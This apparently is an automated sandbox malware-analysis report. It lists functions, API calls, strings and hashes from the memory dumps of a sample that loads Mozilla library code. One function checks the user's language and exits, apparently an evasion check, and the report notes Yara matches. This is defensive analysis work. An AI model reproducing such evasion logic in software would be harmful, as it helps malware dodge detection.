API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: df6aa5e58e2db0a421ecedc1efa079a7f6aaaab7afa7b472f44a15a9fe1b3314
Instruction ID: 8fd6316d98fb1ef03ddf68986f5539d917f7601b125dbe1c2785f23f7b79297e
Opcode Fuzzy Hash: df6aa5e58e2db0a421ecedc1efa079a7f6aaaab7afa7b472f44a15a9fe1b3314
Instruction Fuzzy Hash: 31416E307002058FCB00EF6ACDD8AAEB7B5EF89354F544069E60AA7791EB70ED05CB65

Function 6C5BCC60 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C5831A7), ref: 6C5BCDDD

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C5BCFA4, 6C5BCFB8
<jemalloc>, xrefs: 6C5BCF9F, 6C5BCFB3

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: AllocVirtual
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 4275171209-2186867486
Opcode ID: f7d85d1bf62c194c6a3fb61586254527d3a9ae49c2c8c12c66d43061139e7a74
Instruction ID: 69a56c0aba238b3ed6a457303778c5fa2a0c601f65ffc59b9340014fb851fc5b
Opcode Fuzzy Hash: f7d85d1bf62c194c6a3fb61586254527d3a9ae49c2c8c12c66d43061139e7a74
Instruction Fuzzy Hash: FD31E5707402059BEF05AFA58DA5B6E3F75AB81708F204018F610BB680DBB0E900CB99

Function 6C58ECD0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

Part of subcall function 6C58F100: LoadLibraryW.KERNEL32(shell32,?,6C5FD020), ref: 6C58F122
Part of subcall function 6C58F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C58F132

moz_xmalloc.MOZGLUE(00000012), ref: 6C58ED50
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C58EDAC
wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C58EDCC
CreateFileW.KERNEL32 ref: 6C58EE08
free.MOZGLUE(00000000), ref: 6C58EE27
free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C58EE32

Part of subcall function 6C58EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C58EBB5
Part of subcall function 6C58EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C5BD7F3), ref: 6C58EBC3
Part of subcall function 6C58EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C5BD7F3), ref: 6C58EBD6

Strings

\Mozilla\Firefox\SkeletonUILock-, xrefs: 6C58EDC1

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
String ID: \Mozilla\Firefox\SkeletonUILock-
API String ID: 1980384892-344433685
Opcode ID: 78f40fcb86b3ec18edac39e2e093e6f34eaf8fa38c0e6cc0ea33d031877ad43b
Instruction ID: 97da60e661039c71d46ab827a84fc5d11369c83256972b384e795b2aff3255c8
Opcode Fuzzy Hash: 78f40fcb86b3ec18edac39e2e093e6f34eaf8fa38c0e6cc0ea33d031877ad43b
Instruction Fuzzy Hash: A651C375D06224CBDB10DF68CD406EEB7B0AF99318F44892DD8557B740E7B06D49CBA2

Function 6C5FA520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C5FA565

Part of subcall function 6C5FA470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5FA4BE
Part of subcall function 6C5FA470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C5FA4D6

?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C5FA65B
?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C5FA6B6

Strings

z, xrefs: 6C5FA6AE
0, xrefs: 6C5FA5FB

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: 5ccdb9add1146fbcd6a6b5c17bcefa8f6d62d2cbc46fffde4fa54a1eb61641a2
Instruction ID: dcb9f8446a82476a7c1cf1e4c0435bb2958dfae93187b22f7aba3cb7b65dbfa4
Opcode Fuzzy Hash: 5ccdb9add1146fbcd6a6b5c17bcefa8f6d62d2cbc46fffde4fa54a1eb61641a2
Instruction Fuzzy Hash: 194117719097459FC745DF28C480A8EBBE5BFC9354F408A2EF4A987650EB30E549CB93

Function 6C5C9420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6C5BAB89: EnterCriticalSection.KERNEL32(6C60E370,?,?,?,6C5834DE,6C60F6CC,?,?,?,?,?,?,?,6C583284), ref: 6C5BAB94
Part of subcall function 6C5BAB89: LeaveCriticalSection.KERNEL32(6C60E370,?,6C5834DE,6C60F6CC,?,?,?,?,?,?,?,6C583284,?,?,6C5A56F6), ref: 6C5BABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C594A68), ref: 6C5C945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C5C9470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C5C9482
__Init_thread_footer.LIBCMT ref: 6C5C949F

Strings

MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C5C9459
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C5C947D
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C5C946B

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: 5c27ce6aaeb7b6e835abe423e90401348cd0320b02f6b2850786014f83934063
Instruction ID: ffc08f8551060135a10d69be91b65f7f946b9cb831c6efa74c6c4ca44773bec9
Opcode Fuzzy Hash: 5c27ce6aaeb7b6e835abe423e90401348cd0320b02f6b2850786014f83934063
Instruction Fuzzy Hash: BC01B570B0010187D704DB9EDE91A4532B9BB4532DF04453EDD06E6A82DB37DC55895F

Function 003D6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32 ref: 003D6774
ExitProcess.KERNEL32 ref: 003D67A5
ExitProcess.KERNEL32 ref: 003D67AF
ExitProcess.KERNEL32 ref: 003D67B9
ExitProcess.KERNEL32 ref: 003D67C3
ExitProcess.KERNEL32 ref: 003D67CD

Strings

*, xrefs: 003D678C

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: 4285b131d9ef1d8ba72012454f6291815c50b590a765806d1b7a7e881a5255fd
Instruction ID: c15e8c48f0c732fa78a78a0f0e57146015d7f13605e1aca354602c552957ceb0
Opcode Fuzzy Hash: 4285b131d9ef1d8ba72012454f6291815c50b590a765806d1b7a7e881a5255fd
Instruction Fuzzy Hash: F0F05E359C4309EFD3449FE0E90A76D7B75FB04743F04819DE609862D2D6704B419B96

Function 6C5FB540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C5FB5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C5FB5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C5FB5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C5FB5F4
__Init_thread_footer.LIBCMT ref: 6C5FB605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C5FB61F
std::_Facet_Register.LIBCPMT ref: 6C5FB631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C5FB655

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: bd419404b2f705b1d08e20e655eff4a860d746cffdbd903f8b7c697b195501d7
Instruction ID: 1ae965fad92353af048ffcd222bd2e6dc37d87928582b57aa3b69a4a5f49f9c0
Opcode Fuzzy Hash: bd419404b2f705b1d08e20e655eff4a860d746cffdbd903f8b7c697b195501d7
Instruction Fuzzy Hash: E8316171B00104CBCF04EF6AC9D49AEB7F5EB85325F150519E916B7780DB34A806CF9A

Function 6C5BD5D0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C58EB57,?,?,?,?,?,?,?,?,?), ref: 6C5BD652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C58EB57,?), ref: 6C5BD660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C58EB57,?), ref: 6C5BD673
free.MOZGLUE(?), ref: 6C5BD888

Strings

WXl, xrefs: 6C5BD5D9, 6C5BD63F
|Enabled, xrefs: 6C5BD81E

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: WXl$|Enabled
API String ID: 4142949111-3728714620
Opcode ID: 9f5c16f56afd344872d37e961c069d80f343d6224833c3d5ca067026bd3f0aff
Instruction ID: fbd231299ccd65c5e9e48b1b6379dad2cc2b1361f9d3e053efdf934889922953
Opcode Fuzzy Hash: 9f5c16f56afd344872d37e961c069d80f343d6224833c3d5ca067026bd3f0aff
Instruction Fuzzy Hash: FFA1E0B0A002598FDB14CF69C8E07AEBFF1AF49318F18845CD899BB745D735A845CBA1

Function 6C5D1D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C5D1D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6C5D1BE3,?,?,6C5D1D96,00000000), ref: 6C5D1D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6C5D1BE3,?,?,6C5D1D96,00000000), ref: 6C5D1D4C
GetCurrentThreadId.KERNEL32 ref: 6C5D1DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C5D1DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C5D1DDA

Part of subcall function 6C5D1EF0: GetCurrentThreadId.KERNEL32 ref: 6C5D1F03
Part of subcall function 6C5D1EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C5D1DF2,00000000,00000000), ref: 6C5D1F0C
Part of subcall function 6C5D1EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C5D1F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C5D1DF4

Part of subcall function 6C59CA10: malloc.MOZGLUE(?), ref: 6C59CA26

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: 220b2c0bc1646994556b5fd5dfdfb0f5a17a9f8c74e06d305684e89d225b3585
Instruction ID: 2f560f04e941f3e2940c7495a59f299e5cdf3860c9ff43017c1c560329ff8e27
Opcode Fuzzy Hash: 220b2c0bc1646994556b5fd5dfdfb0f5a17a9f8c74e06d305684e89d225b3585
Instruction Fuzzy Hash: CF416A752007019FCB10DF29C984A56BBF5FF89364F10442EE95A87B41CB71F814CB99

Function 6C5C84E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C5C84F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C5C850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C5C851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C5C855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C5C856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C5C85AC

Part of subcall function 6C5C7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C5C85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C5C767F
Part of subcall function 6C5C7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C5C85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C5C7693
Part of subcall function 6C5C7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C5C85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C5C76A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C5C85B2

Part of subcall function 6C5A5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C5A5EDB
Part of subcall function 6C5A5E90: memset.VCRUNTIME140(ew^l,000000E5,?), ref: 6C5A5F27
Part of subcall function 6C5A5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C5A5FB2

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: da1e0a1647f62fb4a94e3c40208103f9de78d43cf3905f99ba31eeb02affae28
Instruction ID: 864252dc259f9e80ea08825645bdc31ed953faeea59b6cabd2cd57e49ef1b9aa
Opcode Fuzzy Hash: da1e0a1647f62fb4a94e3c40208103f9de78d43cf3905f99ba31eeb02affae28
Instruction Fuzzy Hash: 5F215A74300601AFDB14DB69C888A6AB7B5AF8430DF24482DE55B83B82DB71F958CB56

Function 003D92E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(:=,80000000,00000003,00000000,00000003,00000080,00000000,?,003D3AEE,?), ref: 003D92FC
GetFileSizeEx.KERNEL32(000000FF,:=), ref: 003D9319
CloseHandle.KERNEL32(000000FF), ref: 003D9327

Strings

:=, xrefs: 003D92F8, 003D92FB
:=, xrefs: 003D9311, 003D933D, 003D9314

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID: :=$:=
API String ID: 1378416451-130690077
Opcode ID: 93d2d3c4ea6b4b205fdaccd4922ab84c6d44837d299fb085c08b3d449c6e7daf
Instruction ID: ca2cb2f12fcab3e9b35442d77dea6c32ba385ad4b61cde6177a3739cc5793091
Opcode Fuzzy Hash: 93d2d3c4ea6b4b205fdaccd4922ab84c6d44837d299fb085c08b3d449c6e7daf
Instruction Fuzzy Hash: ADF04F39E40308FBDB14DFF0EC49F9E77BAAB48750F11C255B651A72C0D6709A018B41

Function 6C5CF540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C594A68), ref: 6C5C945E
Part of subcall function 6C5C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C5C9470
Part of subcall function 6C5C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C5C9482
Part of subcall function 6C5C9420: __Init_thread_footer.LIBCMT ref: 6C5C949F

GetCurrentThreadId.KERNEL32 ref: 6C5CF559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C5CF561

Part of subcall function 6C5C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C5C94EE
Part of subcall function 6C5C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C5C9508

GetCurrentThreadId.KERNEL32 ref: 6C5CF577
AcquireSRWLockExclusive.KERNEL32(6C60F4B8), ref: 6C5CF585
ReleaseSRWLockExclusive.KERNEL32(6C60F4B8), ref: 6C5CF5A3

Strings

[I %d/%d] profiler_pause_sampling, xrefs: 6C5CF3A8
[I %d/%d] profiler_resume, xrefs: 6C5CF239
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C5CF56A
[I %d/%d] profiler_resume_sampling, xrefs: 6C5CF499

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: 03f1e1518b1498b6f4fdba205e275c50ef9fc4e7e5b960e8966e0b55b50b206d
Instruction ID: b2d545b470d9d27008983972f195f642556e8d62b606d4363691d2831d77410c
Opcode Fuzzy Hash: 03f1e1518b1498b6f4fdba205e275c50ef9fc4e7e5b960e8966e0b55b50b206d
Instruction Fuzzy Hash: F8F03076700204DBDB006FA6DDC895A77BDEBC629DF10441DEA05A3702DB754C05876E

